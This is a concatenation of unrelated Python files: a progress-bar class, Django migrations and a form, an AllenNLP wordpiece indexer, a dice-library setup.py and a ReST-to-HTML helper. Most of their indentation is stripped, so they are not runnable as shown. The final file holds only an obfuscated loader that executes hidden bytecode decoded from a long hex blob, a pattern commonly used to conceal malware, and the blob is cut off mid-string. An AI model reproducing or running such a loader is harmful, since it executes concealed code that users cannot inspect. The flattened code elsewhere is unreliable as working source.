# The total update count
updates=self.updates,
# The seconds since the bar started
total_seconds_elapsed=total_seconds_elapsed,
# The seconds since the bar started modulo 60
seconds_elapsed=(elapsed.seconds % 60) +
(elapsed.microseconds / 1000000.),
# The minutes since the bar started modulo 60
minutes_elapsed=(elapsed.seconds / 60) % 60,
# The hours since the bar started modulo 24
hours_elapsed=(elapsed.seconds / (60 * 60)) % 24,
            # The days since the bar started
            days_elapsed=(total_seconds_elapsed / (60 * 60 * 24)),
# The raw elapsed `datetime.timedelta` object
time_elapsed=elapsed,
# Percentage as a float or `None` if no max_value is available
percentage=self.percentage,
# Dictionary of DynamicMessage's
dynamic_messages=self.dynamic_messages
)
def default_widgets(self):
if self.max_value:
return [
widgets.Percentage(**self.widget_kwargs),
' (', widgets.SimpleProgress(**self.widget_kwargs), ')',
' ', widgets.Bar(**self.widget_kwargs),
' ', widgets.Timer(**self.widget_kwargs),
' ', widgets.AdaptiveETA(**self.widget_kwargs),
]
else:
return [
widgets.AnimatedMarker(**self.widget_kwargs),
' ', widgets.Counter(**self.widget_kwargs),
' ', widgets.Timer(**self.widget_kwargs),
]
def __call__(self, iterable, max_value=None):
'Use a ProgressBar to iterate through an iterable'
if max_value is None:
try:
self.max_value = len(iterable)
except TypeError:
if self.max_value is None:
self.max_value = base.UnknownLength
else:
self.max_value = max_value
self._iterable = iter(iterable)
return self
def __iter__(self):
return self
def __next__(self):
try:
value = next(self._iterable)
if self.start_time is None:
self.start()
else:
self.update(self.value + 1)
return value
except StopIteration:
self.finish()
raise
def __exit__(self, exc_type, exc_value, traceback):
self.finish()
def __enter__(self):
return self.start()
# Create an alias so that Python 2.x won't complain about not being
# an iterator.
next = __next__
def __iadd__(self, value):
'Updates the ProgressBar by adding a new value.'
self.update(self.value + value)
return self
def _format_widgets(self):
result = []
expanding = []
width = self.term_width
data = self.data()
for index, widget in enumerate(self.widgets):
if isinstance(widget, widgets.AutoWidthWidgetBase):
result.append(widget)
expanding.insert(0, index)
elif isinstance(widget, six.basestring):
result.append(widget)
width -= len(widget)
else:
widget_output = widget(self, data)
result.append(widget_output)
width -= len(widget_output)
count = len(expanding)
while expanding:
portion = max(int(math.ceil(width * 1. / count)), 0)
index = expanding.pop()
widget = result[index]
count -= 1
widget_output = widget(self, data, portion)
width -= len(widget_output)
result[index] = widget_output
return result
def _format_line(self):
'Joins the widgets and justifies the line'
widgets = ''.join(self._format_widgets())
if self.left_justify:
return widgets.ljust(self.term_width)
else:
return widgets.rjust(self.term_width)
def _needs_update(self):
'Returns whether the ProgressBar should redraw the line.'
if self.poll_interval:
delta = datetime.now() - self.last_update_time
poll_status = delta > self.poll_interval
else:
poll_status = False
# Do not update if value increment is not large enough to
# add more bars to progressbar (according to current
# terminal width)
try:
divisor = self.max_value / self.term_width # float division
if self.value // divisor == self.previous_value // divisor:
return poll_status or self.end_time
except Exception:
# ignore any division errors
pass
return self.value > self.next_update or poll_status or self.end_time
def update(self, value=None, force=False, **kwargs):
'Updates the ProgressBar to a new value.'
if self.start_time is None:
self.start()
return self.update(value)
# Save the updated values for dynamic messages
for key in kwargs:
if key in self.dynamic_messages:
self.dynamic_messages[key] = kwargs[key]
else:
raise TypeError(
'update() got an unexpected keyword ' +
'argument \'{}\''.format(key))
if value is not None and value is not base.UnknownLength:
if self.max_value is base.UnknownLength:
# Can't compare against unknown lengths so just update
pass
elif self.min_value <= value <= self.max_value:
# Correct value, let's accept
pass
else:
raise ValueError(
'Value out of range, should be between %s and %s'
% (self.min_value, self.max_value))
self.previous_value = self.value
self.value = value
if self._needs_update() or force:
self.updates += 1
ResizableMixin.update(self, value=value)
ProgressBarBase.update(self, value=value)
StdRedirectMixin.update(self, value=value)
def start(self, max_value=None):
'''Starts measuring time, and prints the bar at 0%.
It returns self so you can use it like this:
>>> pbar = ProgressBar().start()
>>> for i in range(100):
... # do something
... pbar.update(i+1)
...
>>> pbar.finish()
'''
StdRedirectMixin.start(self, max_value=max_value)
ResizableMixin.start(self, max_value=max_value)
ProgressBarBase.start(self, max_value=max_value)
self.max_value = max_value or self.max_value
if self.max_value is None:
self.max_value = self._DEFAULT_MAXVAL
# Constructing the default widgets is only done when we know max_value
if self.widgets is None:
self.widgets = self.default_widgets()
for widget in self.widgets:
interval = getattr(widget, 'INTERVAL', None)
if interval is not None:
self.poll_interval = min(
self.poll_interval or interval,
interval,
)
self.num_intervals = max(100, self.term_width)
self.next_update = 0
if self.max_value is not base.UnknownLength:
if self.max_value < 0:
raise ValueError('Value out of range')
self.update_interval = self.max_value / self.num_intervals
self.start_time = self.last_update_time = datetime.now()
self.update(self.min_value, force=True)
return self
def finish(self):
'Puts the ProgressBar bar in the finished state.'
self.end_time = datetime.now()
self.update(self.max_value)
StdRedirectMixin.finish(self)
ResizableMixin.finish(self)
ProgressBarBase.finish(self)
class DataTransferBar(ProgressBar):
'''A progress bar with sensible defaults for downloads etc.
    This assumes that the values it is given are numbers of bytes.
'''
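    # Hedged usage sketch (byte counts; the total size may be unknown, which is why
    # this class defaults its maximum to base.UnknownLength below):
    #
    #   bar = DataTransferBar().start()
    #   for block in range(64):
    #       bar.update(block * 4096)   # values are numbers of bytes
    #   bar.finish()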
# Base class defaults to 100, but that makes no sense here
_DEFAULT_MAXVAL = base.UnknownLength
def default_widgets(self):
if self.max_value:
return [
widgets.Percentage(),
' of ', widgets.DataSize('max_value'),
' ', widgets.Bar(),
' ', widgets.Timer(),
' ', widgets.AdaptiveETA(),
]
else:
return [
widgets.AnimatedMarker(),
' ', widgets.DataSize(),
' ', widgets.Timer(),
]
class NullBar(ProgressBar):
'''
    Progress bar that does absolutely nothing. Useful when a single verbosity
    flag should switch progress output off without changing the calling code.
'''
def start(self, *args, **kwargs):
return self
def update(self, *args, **kwargs):
return self
def finish(self, *args, **kwargs):
return self
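# Hedged sketch of the verbosity-flag pattern NullBar is meant for: pick the bar once,
# then drive it unconditionally (`verbose`, `items`, and `process` are hypothetical
# names used only for illustration):
#
#   bar = ProgressBar() if verbose else NullBar()
#   for item in bar(items):
#       process(item)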
|
# Generated by Django 3.1.13 on 2021-12-06 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('xero', '0005_auto_20210308_0707'),
]
operations = [
migrations.AlterField(
model_name='banktransactionlineitem',
name='tracking_categories',
field=models.JSONField(help_text='Save Tracking options', null=True),
),
migrations.AlterField(
model_name='billlineitem',
name='tracking_categories',
field=models.JSONField(help_text='Save Tracking options', null=True),
),
]
|
import logging
from typing import Dict, List, Tuple
import torch
from allennlp.common.util import pad_sequence_to_length
from allennlp.data.token_indexers import PretrainedTransformerIndexer
from allennlp.data.token_indexers.token_indexer import IndexedTokenList, TokenIndexer
from allennlp.data.tokenizers.token import Token
from allennlp.data.vocabulary import Vocabulary
from overrides import overrides
logger = logging.getLogger(__name__)
def get_tokens(tokens) :
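    """Split a token list on the single "[DQSEP]" separator token, if present.

    Returns a list holding either one token list (no separator found) or two
    token lists: the tokens before the separator and the tokens after it, which
    the indexer below treats as document and query respectively.
    """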
index_of_separator = set([i for i, x in enumerate(tokens) if x.text == "[DQSEP]"])
assert len(index_of_separator) <= 1
if len(index_of_separator) == 0 :
tokens = [tokens]
else :
index_of_separator = list(index_of_separator)[0]
tokens = [tokens[:index_of_separator], tokens[index_of_separator + 1:]]
return tokens
@TokenIndexer.register("pretrained-simple")
class PretrainedTransformerIndexerSimple(PretrainedTransformerIndexer):
def tokens_to_indices(
self, tokens: List[Token], vocabulary: Vocabulary
) -> Dict[str, List[int]]:
tokens = get_tokens(tokens)
token_wordpiece_ids = [
[token.info[self._index_name]["wordpiece-ids"] for token in token_list]
for token_list in tokens
]
if len(tokens) == 2 :
wordpiece_ids, type_ids, offsets_doc, offsets_query = self.intra_word_tokenize_sentence_pair(token_wordpiece_ids[0], token_wordpiece_ids[1])
else :
wordpiece_ids, type_ids, offsets_doc = self.intra_word_tokenize_sentence(token_wordpiece_ids[0])
if len(offsets_doc) == 0 :
doc_starting_offsets, doc_ending_offsets = [], []
else :
doc_starting_offsets, doc_ending_offsets = list(zip(*offsets_doc))
if len(wordpiece_ids) > 512:
            position_ids = [
                i * 512 // len(wordpiece_ids) for i in range(len(wordpiece_ids))
            ]
        else:
            position_ids = list(range(len(wordpiece_ids)))
token_mask = [1]*len(tokens[0])
wordpiece_mask = [1] * len(wordpiece_ids)
wordpiece_to_tokens = [-1] * len(wordpiece_ids)
for i, (start, end) in enumerate(zip(doc_starting_offsets, doc_ending_offsets)) :
for j in range(start, end) :
wordpiece_to_tokens[j] = i
        return {
            "wordpiece-ids": wordpiece_ids,
            "document-starting-offsets": list(doc_starting_offsets),
            "document-ending-offsets": list(doc_ending_offsets),
            "type-ids": type_ids,
            "position-ids": position_ids,
            "wordpiece-mask": wordpiece_mask,
            "mask": token_mask,
            "wordpiece-to-token" : wordpiece_to_tokens
        }
def add_token_info(self, tokens: List[Token], index_name: str):
self._index_name = index_name
for token in tokens:
wordpieces = self._tokenizer.tokenize(token.text)
if len(wordpieces) == 0:
token.info[index_name] = {
"wordpiece-ids": [self._tokenizer.unk_token_id]
}
continue
token.info[index_name] = {
"wordpiece-ids": [
bpe_id
for bpe_id in self._tokenizer.encode(
wordpieces, add_special_tokens=False
)
]
}
@overrides
def as_padded_tensor_dict(
self, tokens: IndexedTokenList, padding_lengths: Dict[str, int]
) -> Dict[str, torch.Tensor]:
# Different transformers use different padding values for tokens, but for mask and type id, the padding
# value is always 0.
return {
key: torch.LongTensor(
pad_sequence_to_length(
val,
padding_lengths[key],
default_value=lambda: 0
if "mask" in key or "type-ids" in key
else self._tokenizer.pad_token_id,
)
)
for key, val in tokens.items()
}
def intra_word_tokenize_in_id(
self, tokens: List[List[int]], starting_offset: int = 0
) -> Tuple[List[int], List[Tuple[int, int]], int]:
wordpieces: List[int] = []
offsets = []
cumulative = starting_offset
for token in tokens:
subword_wordpieces = token
wordpieces.extend(subword_wordpieces)
start_offset = cumulative
cumulative += len(subword_wordpieces)
end_offset = cumulative # exclusive end offset
offsets.append((start_offset, end_offset))
return wordpieces, offsets, cumulative
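    # Worked sketch of intra_word_tokenize_in_id (illustrative values only):
    #   tokens=[[101], [2054, 2003]], starting_offset=1  ->
    #     wordpieces=[101, 2054, 2003], offsets=[(1, 2), (2, 4)], cumulative=4
    # i.e. each (start, end) pair covers one original token's wordpieces, end exclusive.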
def intra_word_tokenize_sentence_pair(
self, tokens_a: List[List[int]], tokens_b: List[List[int]]
) -> Tuple[List[int], List[int], List[Tuple[int, int]], List[Tuple[int, int]]]:
wordpieces_a, offsets_a, cumulative = self.intra_word_tokenize_in_id(
tokens_a, self._allennlp_tokenizer.num_added_start_tokens
)
wordpieces_b, offsets_b, cumulative = self.intra_word_tokenize_in_id(
tokens_b, cumulative + self._allennlp_tokenizer.num_added_middle_tokens
)
text_ids = self._tokenizer.build_inputs_with_special_tokens(wordpieces_a, wordpieces_b)
type_ids = self._tokenizer.create_token_type_ids_from_sequences(wordpieces_a, wordpieces_b)
assert cumulative + self._allennlp_tokenizer.num_added_end_tokens == len(text_ids)
return text_ids, type_ids, offsets_a, offsets_b
def intra_word_tokenize_sentence(
self, tokens_a: List[List[int]]
) -> Tuple[List[int], List[int], List[Tuple[int, int]]]:
wordpieces_a, offsets_a, cumulative = self.intra_word_tokenize_in_id(
tokens_a, self._allennlp_tokenizer.num_added_start_tokens
)
text_ids = self._tokenizer.build_inputs_with_special_tokens(wordpieces_a)
type_ids = self._tokenizer.create_token_type_ids_from_sequences(wordpieces_a)
assert cumulative + self._allennlp_tokenizer.num_added_end_tokens == len(text_ids)
return text_ids, type_ids, offsets_a
|
#coding=utf-8
"""
__create_time__ = '13-10-29'
__author__ = 'Madre'
"""
from django.forms import ModelForm, CharField, Textarea
from brief.models import Brief
class BriefCreateForm(ModelForm):
brief = CharField(max_length=1000, widget=Textarea(attrs={'cols': 2, 'rows': 2}))
class Meta:
model = Brief
exclude = ('slug',)
|
# Generated by Django 2.1 on 2019-03-13 02:22
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='LibraryProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('libraryAddress', models.CharField(max_length=30, null=True, verbose_name='Library Address')),
('Phone', models.IntegerField(null=True, verbose_name='contact Us')),
                ('user', models.OneToOneField(on_delete=models.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from setuptools import setup, find_packages
setup(
name="dice",
version="3.1.2",
author="Sam Clements",
author_email="sam@borntyping.co.uk",
url="https://github.com/borntyping/python-dice",
description="A library for parsing and evaluating dice notation",
long_description=open("README.rst").read(),
license="MIT",
packages=find_packages(),
install_requires=["docopt>=0.6.1", "pyparsing>=2.4.1"],
entry_points={
"console_scripts": ["dice = dice.command:main", "roll = dice.command:main"]
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Other Audience",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Games/Entertainment",
"Topic :: Games/Entertainment :: Board Games",
"Topic :: Games/Entertainment :: Role-Playing",
"Topic :: Games/Entertainment :: Multi-User Dungeons (MUD)",
"Topic :: Games/Entertainment :: Turn Based Strategy",
"Topic :: Utilities",
],
)
|
#!/usr/bin/env python3
# -*-Python-*-
#
# Contains the process_rst() function, which turns ReST files into
# HTML output that can be included in a page.
#
import io
from docutils import core
from docutils.writers import html4css1
class WeblogWriter (html4css1.Writer):
def __init__ (self):
super().__init__()
self.translator_class = WeblogHTMLTranslator
class WeblogHTMLTranslator (html4css1.HTMLTranslator):
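    """HTML translator that suppresses the doctype, <head> boilerplate, and stylesheet
    links so the generated markup is a bare fragment suitable for embedding in a page."""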
doctype = ""
generator = "<!-- %s -->"
content_type = "<!-- %s -->"
def __init__(self, document):
super().__init__(document)
self.head_prefix = []
self.body_prefix = []
self.stylesheet = []
self.body_suffix = []
self.section_level = 1
def visit_system_message(self, node):
pass
def visit_document (self, node):
pass
def depart_document (self, node):
pass
def process_rst (filename, body):
"Parse 'body' as RST and convert it to HTML"
output_file = io.StringIO()
body = core.publish_string(
reader_name='standalone',
parser_name='restructuredtext',
writer=WeblogWriter(),
writer_name='html',
source_path=filename,
source=body,
destination_path=filename,
settings=None,
settings_overrides={'input_encoding':'utf-8',
'output_encoding':'unicode'})
return body
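# Hedged usage sketch ('post.rst' is a hypothetical filename, used here only for the
# source/destination path reporting; the body itself is passed in as a string):
#
#   fragment = process_rst('post.rst', 'A *small* ReST body.\n')
#   # `fragment` is an HTML snippet without an <html>/<head> wrapper.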
|
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b16decode("789CED7D09781CD779D89B5D2C80C57D1120780E49110429E15A5C04259022095E122F2F4981A2CC6C063B036080BDB8334B0232683B96EBCF69D3D87224CB75E42B75DCA47595D64913E7FCECAF4DE2A4B19DE48B73D5496CBA8E93A66E92B6768E3A71FFFF7FEFCDB13BBB58502225C7E2F1F6CD9B77CDCC7BFFFDFF2FC9C49F08FC7F14FE5BDF0833A6C33F85A518BBE6E415764D91F910BB1692F930BB1696F91A76AD46E623EC5A44E66BD9B55A99AF63D7EA64BE9E5DAB97F928BB1695F90676AD41E61BD9B546996F62D79A281F62A966966E61D75A98B2DAE6BB3D9BD9C16A8C56B6DCC0F25F648AA2188C2D4195307B46614A26C6AEBA0DA86F6F8366C56D50C31B28EC2AD68EB0543B4B77B06B1D4CC1EB5A1C2EDDC9AE7532C5E8628642B5E1676913D3EBF845135BEA64CFC04BEC6646375BEA61C6667E032E7A19DEDEC296B6620D1D5E4314EE298A7E822D28583DB18DE94DECEDD07A3BD39B29B383E9F0C83B99DE4A972AD3DB98B68B2D407E37A6DA1E4A1FA0742F95F751BA8FD27E4AF7537A80D207297D88D2014A07291DA27498D2114A634C6F67D746990E6F608CE99D348171A677516682E99B2833C9F46ECA1C647A0F65A698BE99328798DE4B998799BE85328F307D2B65A699BE8D328799BE9D324798BE83328F327D27658E325DA5CC31A6EFA2CC71A6EFA6CC0CD3F750E604D31FA0CC49A6EFA5CC29A6F751E634D3F751E60CD3FB29F318D3F753E671A61FA0CC59A63F4899734C7F8832E7993E40990B4C1FA4CC45A60F51E60D4C1FA64C9CE92394B9C4F418652E337D943257983E469927983E4E9959A64F50E62AD32729F324D30F52E61AD3A728F314D30F51E68D4C7F9832D799FE0865BE87E9D3944930FD3065BE97E94728A331FD51CACC31FD2865924C3F46199D1906D38FB3B7C3169E67C602D367D87288E5FF3A6C8CE3E25332B41B2EF59F84ED6F7E1BFE9CEF57206B37407279316F68FAC56C366575C365CECCC5543363D95A2AA5A68DE4A296319F36AC4DC5B7F2C68D8261D916EFA81592E3D94CC648DA663673229FCFE6F98D3A488EE5B3B72C236FD740BE60CF1FB4EB2193D65612B699364CAC66E144AE409D81A30B46C6B666E1F242CEC86B4353830787D5FEA3193D9F35F587552A54CF9919736874623036188B8D8F0D8D8C4C0D8E8CC61E56AF3CAC9AFA7EF5621E26961D8A0D8EC406C762A3EA1346DE82590DC1E5C8445282431CF7388E8D4F0D6FE7D4691BC0026CEF10BD32000197FA4370EBBCD506E9D6A7461E9E1A493FB5EBBA7AB9601772FD617C3ABC9FB56CCC5BAB163DA0B162DAFDD8BF9B58584D5FB06BE167D94815B47C2F96D6D02C224A12678255C2724698AC3CC2D6685E3D33D787D96D8539B35BE390485C8769B630F45204A126DEB901208FA61FA6E963F70D0B6FEA7AE9D4979F7EFB917E9C451C139A8F65EBD9826D236EB895376D8372F3A982B5484F835F888AAC9461E4E87DD8D8DFD3941AA5CF887597B4940620170AEBE911DB9536A559B106E19EDA402F72327DE7BDEF2CF7CF57E5ED25F7B144A53F546F227DE78577DD79EFC7CBFDFBD2CF3EFB571F7AEE3FC24FD94A2FBCCB33A4F8D077DEFB0BDE7FAAA830A026D48181C4C0005DC7D2779E7FEECEF31FBBF3FC0B779EFB813BCFBDF5CE73EFBEF3DCC73D192C849952B5776335CCBCE07D0BB267F99BC0DED5011A26214681F6CFE2BFE75EA4AE3F4A19E8FD7D94F9291AECADE2DFF31FBEF3FCBF56E9E7C761A8A027FB84F79F7CB00155E50FE73CD9BBA9870FC0002A0D02FF9EA341E89A9EEAFD9450D50FF007184D9F387BE6F2892A3EF3BDFA86AAE8BE6831892FF0AAFC73BFC2F3CF8AB774407EEFA3057B319B172F62247D48BE9173F1C19913C72E38CB23E00FF456A1E353A6BD58982BED78D1B673D6A1A1A105BA3F98CCA687CEE5678CB9AC3B52E58E4F1EF37C3AA7E3587AEB53634EE7F37383696328AD59833AF43C381CDBFAD4705AB6A15E2B0C20E075E000C383B2ABE03F4103BCFFD5FBF21FA0598C8EA69FBAF3E20F5D572F99296D7159CBA867B30B668663B3342033F5E88296572F9BBAB6AC1E5F3492CBB9AC99B11B0857F930C3498EAB00D003B9BB1066B701510C23A298B9DE8F4802685A400F3DA77CA80CF0D3520D12B8841CBA0572A825E480407E10DE1BCF0C3A9941D57A0032CD12EFC106BB2EBFC3D9ACA69B9905F9AE5DD41291A8251EC5A41193264C9A114D10F2881052B1CD654220D952044278D55CEE9354010BB502F2A887FF26556B26643C3A923E9FB5D5270AA98C15E525B1345ED12BC3816BE52BFB65E898BF0E9D23CED52D88B8F92B7C2684AFD0E6487436F342A806D01E4C723E44DCC2A74240B0FB1A03D23C755AA7B7D90519BC021A87F30388A4EBD9523D12FB78196276943A5E6D47520BBE06B1003890CA6AEC46B6D444A37C029918
BD01BB6AE6E41AB024760BB569658936CAB433BD11F98567A0327C622CEA40B6E191B590BC68618F60AE937F74C87561EE7618D989B5305BAE65F9B9D0EAA0024C052E12A0F77BA0710F50FC3DB76B98D988543FD0FB1340EA03913F0175A0FF0920F381C09F00DA1EA87AFAD90A3FDB90909F001A1EA8F709E805DA4C00FD0E94FB0410ED40AE4FDC8E307B135BEA46921DDF462D5BAB4516698DB35D78B199E657C7D622780328C1B53AA4EB27F03E90F53073BB175928983C10F76BB88095DBF5CCDECA96B6B13578D5DBA9E7A8FC9EFDF43D1BD81A3CFB0EB6164506A0970683829D9CAC3B80AF197A55911710557AE8CBEE624BBB912FA00BB1226ECCC18A80DA7BD8D203F4ADBE2754F4ADA0C65524AF07E42B7E21049C8424268197F0F43DCC2F44C34F8780AFA85871AFB31A68C7C670C7D20E4AA60C2D4F0B3F858064D05EB1693FE5CD31B96F1CE8F76EEB98877E253024F6F1A533678F9E7EFCE879F5EC855367CEAB471FBF725E3D79F438609D0B8FAB47CFCF1C55BDADAC073DDD3CC83B199D489FD1874EA43533E5406B49B3F8EA0F38F52F6A96752B9BD74BEB231D2EF1477A705E4B02E6C82E2382B2B62309EB25C109521ED535F5F16CC658B64CA2C433790211F4860C9C1391B03918D042886069378D01DDB869260DEB145C6B3933B16CAC4E1F3C18D30E8E4D0D8F4E8CE8DAD4C1C9E1D8DCFCD4A4361C1BD1F5E4C8989ECC1B3A3025A696B212F66ACE98CE8947A031A6ADEF458A399B4F6BF6F463972E9C070606A0BA6D24D25A72D1CC1809539F1E710A2DC342DC9648C2A39986353D92CA26B594316D6412572E01ADBD98D5A735200906E9C3CA91A6AD87F1EB1A76219F4958562A011C4EB6908707991EBE393D32383C119B3F9834A6E627C7E646203B961C898D2693B1D1B1D1496D4C1B8DD92AB45FEF418959136F85783439BC8D1C50F16BA0978B0F4C7C047F01B40847EC4E48035E83BDD95B5EF426F857C3B740FDF1D7422BD97D1D7487BF241A69D8EE2AF35A2C4423F05EA8DA4D422A697D9C336AE682B5CFB3D4E0817D8B6D08B94760456F1AF9C1DC628EC6CC6980A72DEAEC968D184D4BE220093BBB6C64AC61EFEA9404ED8B3F244A3C681371BE55A0A6D639CF1416F25A6ED13F09A09EE6F3A691D1AD236255E480D1EC2B98BA35BD70CB4C172C6DB4CF3B8B69D3E1E8930E05610D166D1C416A1D4D26B3858CAD9ED62CF59861643C440771BBF9B43A909F571DE0E2A078ABA7A8C353DA829652CF695661B91F71763CE27096C0101B695A25D91C2C9C1AFA769902ADACC78D551212D0923B7381E76B383CCBDA08D8F2DAAD046C00E04DEB68D5D8B818E3B8B268AFCFE5A99623A0A05EAFC4CF524F71BCA0EE2EE70BFC5602DEAE9DCDAF526FA69558B4D3299BA0829132927602D72FB5A00CCDBF3097366DCA2EE00A4B51D345CD5A4C9973B49232C62DBA5DC8E9B0A0693E8BC68A6E2EC002A241A58C846A432734C09295CDD0624F0119C56506B6B162C71B24E84AA6B216DF5DF8C95D028ABEADB19234722863B1E28A6C409FA9BFD121AF6039D8F49260CBE1C8B95BFC179E21BE5FBE1998B2460B7A85522D8E129E788BBCFDB4A1EB25C459FC2CFC9CC0EB252C059A2CACB42A8D4A27E4224A14FE37C1751D9422CB1F511A434DC4FA372B0D70A709CABB954B0AD2734D4A9752AB6C523AE0AA1DEE4620DF4C3D4594166815E1AD42FC97883A7CA11149D4D5C384567B91AEE3D430E07D40A2484D30369B9901EA8A13700924AD04FDCBE5C340BB01CEF552C4F0D2966A51DE4B17751CE77E955D5DBD49E45C14A93BA0B07B048507A44423D24F40BC71220FA99F7AD60BD4CA1A5178BD404C89860D4EC3886C18910D6B19100240050159D70B741DD229400ACD669661F22D34F96D4AC9E49BAB9A7C3F74518FB4E3521B75749C3A6A47CAB5053BE870A94C6FEFBC462B0A9D8136EC22C2100A3A91B2E901C2D0A61CD4DC0CD41EDCEEA6DB44D1C9DB3525B7372351276FD795DCEE7547DB42055B710EDB30D98EC90E4C7662A262B20B93DDF80C5DAE946E0FD2457E6A88AF66C40ED616E697DE21B05433C03CCC0308D4D701770FAE07A58FF860306D9D8C9636E2E771E8C975613C00192B9937E780E32DEAA98E40503AAD01CCA2AD9DB5B55482C0B635E27F2401D42F19C04EDA66665553B5E54246856E342F60DF56F4228A69283FD9F89C89E426E151A421F9EF0BD621FA7DB63CB6935284F3F0164A3878731F135241594D74FC6CF51D9F3C7666A6A4E3EA9B5F82375EDADCF7E81F1693FA80B587F73A709853AF930F8F0DA74706559454AB67329CE64158DC1F502F3608E835B9AC9E149F5C154897E8DCE2CAA383EAB1AC6DF506DC1A1B542FD88BB04002EF8EC36C08FD04DE9D18444943B66013DEF6DC1DC1BBC383EA8915D3162CB56C03B5FA69F70C495C80FA81784C22F738D2142E56229C109FC10431431C25147124AFE3A71971D62
863CEC771C9C61FC704B14D7C14937A592165708C983353E6623F16C7CFC97B59FB56FC929C096C2D8DB696B8C549328E8D612B95222C24CDDE8AD797096185955E42281CAD3486C280703A00FD34D0EF66CFBD06424588C2B0A45DD9497FDBA9CCFB97509314E0136ADAAB30819710A23392E287481DB30F012D802E8583DFBFA75B35746B1AA91A2AFDEF541AA1D24B523291F91C95D652A989EF824A3F49A57554FA1644FE54FA23545A4FA5BF8AB4D8529D143C005600F8D98038A70B26C26F354975026017CA71A145E61AF5D342FDFC8DECA7554A41F0A28D5F34F0FA07A87E3BD56F764ABB50A3885810F0488FF3F004B7BB086E6FA69589323A4740FDD372B3DAF42DBBFD80EBB896D967AB463A67AFC67732A19088513A4AE918A5E304FE031962EC70C1B4D55C219552B37913E9F2B406E46ADE42B58543DF4A09D731DCC7129050E713817883D0C58ABE308004AF1ACCCB0EE5CDA79F1E4C6B0BF013DF8B93EB625EF6FCBDD7E5A8A47393C3A2B44BBB09FCA63667A488D68BE393C59FC21780A8CFE4E00858614E17670A89459836D7B5E1D55C96D39F29CDCC783632EDC461B91D496917BFCC02D45734D44FE0F504AD7924E82240A23595FCE7C420EE217ED52CEE0842AE4EFCA7DDF29325D2B95E9F748EEBB788AA9B64289C73A83A4EC8F1A615682124727C023CDA0275B841700B44C5D6E0941D6C0DAA43A239D824927A0B21ADB6D48204DE12ED0020F656BEA9A05C0A28B799EBBFA3DC26C12BD03FB0897A976B99F53579DD42D7F94F33D16BAB2CED81FDD3537E84087366B9DA8EFB0A4847EC1C36D16CA61BDE05A7ED1E43DA0EB6D8A9D39949E52AD6ECA49A2D25356DAAD98535FF3DA39A9BA8667749CD0F52CD1EACF924AFB9996AF696D4FC0CD5DC8235E145AF6E42E120D6DC06346DE95CBF49B5B7CBDAED680380B57796D45449CCA6CA9A6719517E2B8F52F5DDF8CAC79082C601F71011FD803BE08DB190EC6681BAD90B4DA1F02AFC9F9DCDB43B83BC15EFD20289A215812081B96C8EC1BF597D1FE34BC477936017EE8CF39CC02C253C5F16CD1908B10EB312D91B902D67903F56CFCC888A43A218492F51593DE44013AF38EECE8B3FE774722EBB98CDA8970B99858582AC3C3838682160A84E40E1235CE36F4008720513A281B756EEC6428ED3DF837FA61FFC5967A6F05C5A893AEC906A4D79EA1F59AFB6A8E850BF6547735EAB57BD5476B432B5AB1E8D64A8C55D1C52E348B79519B24C93AA873C9F4D67F3EA652395CB669C6E0EA924DF4A67E7CC9491C8C1D230CABDDFE0E61E7CC517FBFE32C39FCD2E03B6F2CD1F06AF675CF64764F564E0C0810D4B9EBABFDCB0DAA2990F1A75CECCDB8BBAB64AE82D60D4807625833E5466D04BC67236A52D167D2C18186187A117C4F3EE719B07A836DF2C7727174F2517D164E7A16A9A78A7B83E8163ED2C26482E1A081C809B74BAE9EF603E76007985F8554C884F28E20E461D7205215F5966813309488BF4237D403C00011102AA44E427B35C7198E3922ACCDE28A55416E0E70B784DF42389A97A3D543FA74F9A04D5DFAEA840D97740098AAD9A9568A8FCEFA6A26BE40C78693BF45A136A505A424013B95C8123B07A89BDAA740E103944F843D288491326CD5220043409246D1CD93928AEFDFEA2B8475820AF8DB65E458C74BFD85597B5FC82618B2EF6D3560860C2CF1552B6A91ECB176C0328E4A4E1F463C5021A00237EA99003F6BE7CB3B18066C0A453D59354B5CC0477043404FEFD490D76B27A3C85A0F681802AC0C41F4D03380644CF556D43A72F96E3E7712307F0F30D1BDDAD246B46FE21C1797245EEC7D2CDB6083FDBE03E41DC729B6D7DB6F94BAC4AB6F93F05B2CD1FF2B0CDD724DB2CF9E4B779B8E79CC327A73CDCF33B90BFA5D2273CDCF38B4CEEAE47A9344AA59F40E9AE87E36DA0D2CF48653F72BC9C73805D56C4F1E24BAECCF1C635B63EC71B9FC304DF615CC7C4C0641E93CA0C25EEE81204CD170741678B09390BDAA4705D441E79C8082D06CB4C715340DC1F949BC3254F4B8538CC555CC8D41E08BD390EC815D9252EA6D2C583238EE1E239400BC2CF53D60572970E1FD9E485AF46E41EC3D750645DF8BAFA33357654F090829F6CF4F2934DDCECA2B912D71746CE6D8D4C369099C13EDABC936A97221760F9028BF988CEC4B0AB4EE08DBAC8C603189F25CEF7E144BA612228BAEF715414CD6847427616C85D21D7574B360DCF29C0FBC1536EF14C0D393D8544F6DB4803C039A5ED7C229D421415460EAF96383CECE7CBA21FF56E3ABB12960FB30B1EA62EE061EAAA7A182DB4CEC3D4058FFF8590FF615E0A55F330653A7B6708EBEF165FA63EE061EAAB7A98C1F03A0F531F3C7E7DD1C3BC295CCDC394E9ECE74912B287F5DE8EA249CD5217F2E3C076736B9CD2476BA8EAD1A235EB3C5A43F06C0614FFA33D5153CDA395E9EC4BC8FCDF6E0C7888C6AA1EE273EB3D4463F0B88BCCFF
